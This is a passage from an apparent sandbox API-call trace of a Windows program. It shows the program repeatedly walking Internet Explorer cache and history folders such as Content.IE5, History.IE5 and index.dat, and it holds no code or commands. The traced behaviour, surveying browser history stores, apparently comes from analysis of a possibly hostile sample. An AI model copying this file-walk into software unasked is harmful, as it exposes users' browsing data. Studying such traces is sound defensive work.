hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.697] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xed0fc650, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0147.697] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.697] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0147.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0147.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0147.698] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.698] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xed0fc650, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0147.699] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xed0fc650, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0147.699] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0147.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0147.699] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.699] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.699] CoTaskMemFree (pv=0x4e1c10) [0147.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0147.701] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97fe0a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97fe0a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97fe0a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.701] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97fe0a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97fe0a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97fe0a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History.IE5", cAlternateFileName="")) returned 1 [0147.701] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97fe0a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97fe0a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97fe0a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History.IE5", cAlternateFileName="")) returned 0 [0147.701] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0147.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0147.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0147.702] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97fe0a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97fe0a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97fe0a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.702] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97fe0a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97fe0a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97fe0a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History.IE5", cAlternateFileName="")) returned 1 [0147.702] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.703] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0147.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0147.703] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.703] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.703] CoTaskMemFree (pv=0x4e1c10) [0147.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0147.704] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97fe0a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97fe0a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97fe0a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.704] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97fe0a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97fe0a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd9824200, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x91, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0147.704] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd97fe0a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97fe0a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xed0fc650, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0147.705] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.705] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0147.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0147.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0147.706] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97fe0a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97fe0a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97fe0a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.706] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97fe0a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97fe0a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd9824200, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x91, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0147.706] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd97fe0a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97fe0a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xed0fc650, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0147.706] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd97fe0a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97fe0a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xed0fc650, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0147.706] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0147.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0147.707] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.707] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.707] CoTaskMemFree (pv=0x4e1c10) [0147.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0147.709] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd978bc80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd978bc80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd978bc80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.709] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd978bc80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content.IE5", cAlternateFileName="")) returned 1 [0147.709] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd978bc80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content.IE5", cAlternateFileName="")) returned 0 [0147.709] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0147.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0147.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0147.710] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd978bc80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd978bc80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd978bc80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.710] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd978bc80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content.IE5", cAlternateFileName="")) returned 1 [0147.711] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.711] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0147.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0147.711] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.711] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.711] CoTaskMemFree (pv=0x4e1c10) [0147.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0147.712] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd978bc80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.713] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="03J4UQW0", cAlternateFileName="")) returned 1 [0147.713] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0147.713] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd978bc80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd978bc80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xed0fc650, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0147.713] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KETAJP6D", cAlternateFileName="")) returned 1 [0147.714] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VB18B0KB", cAlternateFileName="")) returned 1 [0147.714] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XT1RPYG9", cAlternateFileName="")) returned 1 [0147.714] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XT1RPYG9", cAlternateFileName="")) returned 0 [0147.714] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0147.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0147.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0147.715] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd978bc80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.716] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="03J4UQW0", cAlternateFileName="")) returned 1 [0147.716] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0147.716] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd978bc80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd978bc80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xed0fc650, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0147.716] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KETAJP6D", cAlternateFileName="")) returned 1 [0147.717] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VB18B0KB", cAlternateFileName="")) returned 1 [0147.717] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, 